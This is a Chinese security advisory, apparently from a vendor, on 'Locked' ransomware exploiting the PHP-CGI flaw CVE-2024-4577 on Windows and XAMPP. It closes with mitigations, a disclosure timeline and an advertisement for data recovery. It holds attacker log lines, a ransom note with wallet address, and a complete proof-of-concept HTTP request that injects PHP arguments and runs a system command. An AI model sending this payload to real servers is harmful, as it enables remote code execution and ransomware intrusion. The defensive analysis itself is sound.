1. Locked勒索病毒介绍
2. 攻击说明
2.1 PHP简介
2.1.1 XAMPP简介
2.2 真实攻击案例
88.218.76.13 - - [08/Jun/2024:05:54:06 +0800] "POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3d0+%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 200 145 "-" "Mozilla/5.0 (Linux; Android 8.1.0; TECNO KA7O Build/O11019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.120 Mobile Safari/537.36"
88.218.76.13 - - [08/Jun/2024:05:54:20 +0800] "POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3d0+%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 200 145 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true"
2.3 加密样式
2.4 勒索内容
send 0.1btc to my address:bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l. contact email:[email protected],if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me .your id:
勒索信表示,若想恢复数据,需要将0.1比特币打入黑客的比特币钱包地址,并且提供了自己的电子邮箱。
按照本文撰写时的实时汇率计算,该勒索金额折合人民币约为4.9万元。
| 比特币钱包地址 | bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l |
|---|---|
| 电子邮箱 | [email protected] |
3. 漏洞详情
3.1 漏洞概述
| 漏洞编号 | CVE-2024-4577 | 公开时间 | 2024-6-7 |
|---|---|---|---|
| 漏洞类型 | 远程代码执行 | 漏洞评级 | 高危 |
| 利用方式 | 远程 | 公开PoC/EXP | 公开 |
3.2 影响范围
PHP 8.3 < 8.3.8 PHP 8.2 < 8.2.20 PHP 8.1 < 8.1.29
XAMPP Windows版 影响版本 <= 8.2.12 XAMPP Windows版 影响版本 <= 8.1.25 XAMPP Windows版 影响版本 <= 8.0.30
3.3 漏洞利用条件
用户认证:无需用户认证 前置条件:默认配置 触发方式:远程
4. 漏洞复现
4.1 复现环境
4.2 复现详情
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.0.136
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 19 Nov 2023 11:10:25 GMT
If-None-Match: "1443-60a7f6a8cca40"
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
<?php echo system("whoami");?>
5. 防护措施
5.1 官方修复方案
5.2 缓解漏洞方法
5.2.1. 对于无法升级PHP的用户
RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]
5.2.2. 对于使用XAAMPP foe Windows的用户
LoadModule cgi_module modules/mod_cgi.so
# LoadModule cgi_module modules/mod_cgi.so
ScriptAlias /php-cgi/ "C:/xampp/php/"
# ScriptAlias /php-cgi/ "C:/xampp/php/"
6. 漏洞报告时间轴
2024/05/07 - DEVCORE通过PHP官方漏洞披露页面报告了该问题。 2024/05/07 - PHP 开发人员确认了该漏洞,并强调需要及时修复。 2024/05/16 - PHP 开发人员发布了修复程序的第一个版本并征求反馈。 2024/05/18 - PHP 开发人员发布了修复程序的第二个版本并征求反馈。 2024/05/20 - PHP 进入新版本发布的准备阶段。 2024/06/06 - PHP 发布了 8.3.8、8.2.20 和 8.1.29 的新版本。
7.安全建议
7.1 风险消减措施
资产梳理排查目标:根据实际情况,对内外网资产进行分时期排查
服务方式:调研访谈、现场勘查、工具扫描
服务关键内容:流量威胁监测系统排查、互联网暴露面扫描服务、技术加固服务、集权系统排查
7.2 安全设备调优
目标
主要目标设备
7.3 全员安全意识增强调优
目标:
形式:
线下培训课表
1.提供相关的安全意识培训材料,由上而下分发学习
2.组织相关人员线上开会学习。线上培训模式。
线上学习平台
8.团队介绍
More
9.我们的数据恢复服务流程
① 免费咨询/数据诊断分析
专业的售前技术顾问服务,免费在线咨询,可第一时间获取数据中毒后的正确处理措施,防范勒索病毒在内网进一步扩散或二次执行,避免错误操作导致数据无法恢复。
售前技术顾问沟通了解客户的机器中毒相关信息,结合团队数据恢复案例库的相同案例进行分析评估,初步诊断分析中毒数据的加密/损坏情况。
② 评估报价/数据恢复方案
您获取售前顾问的初步诊断评估信息后,若同意进行进一步深入的数据恢复诊断,我们将立即安排专业病毒分析工程师及数据恢复工程师进行病毒逆向分析及数据恢复检测分析。
专业数据恢复工程师根据数据检测分析结果,定制数据恢复方案(恢复价格/恢复率/恢复工期),并为您解答数据恢复方案的相关疑问。
③ 确认下单/签订合同
您清楚了解数据恢复方案后,您可自主选择以下下单方式:
双方签署对公合同:根据中毒数据分析情况,量身定制输出数据恢复合同,合同内明确客户的数据恢复内容、数据恢复率、恢复工期及双方权责条款,双方合同签订,正式进入数据恢复专业施工阶段,数据恢复后进行验证确认,数据验证无误,交易完成。
④ 开始数据恢复专业施工
安排专业数据恢复工程师团队全程服务,告知客户数据恢复过程注意事项及相关方案措施,并可根据客户需求及数据情况,可选择上门恢复/远程恢复。
数据恢复过程中,团队随时向您报告数据恢复每一个节点工作进展(数据扫描 → 数据检测 → 数据确认 → 恢复工具定制 → 执行数据恢复 → 数据完整性确认)。
⑤ 数据验收/安全防御方案
完成数据恢复后,我司将安排数据分析工程师进行二次检查确认数据恢复完整性,充分保障客户的数据恢复权益,二次检测确认后,通知客户进行数据验证。
客户对数据进行数据验证完成后,我司将指导后续相关注意事项及安全防范措施,并可提供专业的企业安全防范建设方案及安全顾问服务,抵御勒索病毒再次入侵。
点击关注下方名片进入公众号 了解更多
更多资讯 扫码加入群组交流
喜欢此内容的人还喜欢
索勒安全团队
索勒安全团队
索勒安全团队
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...